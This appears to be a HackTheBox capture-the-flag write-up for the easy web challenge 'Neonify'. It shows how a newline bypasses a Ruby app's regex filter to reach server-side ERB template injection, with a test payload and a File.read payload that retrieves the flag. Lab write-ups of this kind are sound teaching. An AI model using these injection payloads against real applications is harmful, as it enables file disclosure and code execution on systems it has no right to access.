HackTheBox Writeup - Challenges - Neonify

HackTheBox Writeup - Challenges - Neonify

🕒 2025/04/28

  • Category: Web
  • Difficulty: Easy
  • IP: 94.237.61.82:37667

1. Website

image

  • If your input contains only numbers, letters, and spaces
    image
    • 123 abc
  • If it includes anything else
    image
    • Malicious Input Detected

2. Source Code

  • app/views/index.erb
    image
  • app/controllers/neon.rb
    image
    • #14: it will check if the input contains only numbers, letters, and spaces
  • index.erb#16 & neon.rb#15: it evaluates user input as ERB, stores it in @neon, and renders it inside an <h1> tag.

3. Bypassing Regex Check

As demonstrated in the referenced article, we can bypass the regex check by \n into the input.

Let’s first send a test payload to verify that the injection works:

  • Payload: 123\n<%= 1+1 %>
    • Encoded: 123%0A%3C%25%3D%201%2B1%20%25%3E
  • Request
    image
  • Response
    image

It works. We proceed with the actual payload to read the flag:

  • flag.txt location
    image
  • Payload: 123\n<%= File.read('flag.txt') %>
    • Encoded: 123%0A%3C%25%3D%20File.read%28%27flag.txt%27%29%20%25%3E
  • Request
    image
  • Response (Flag)
    image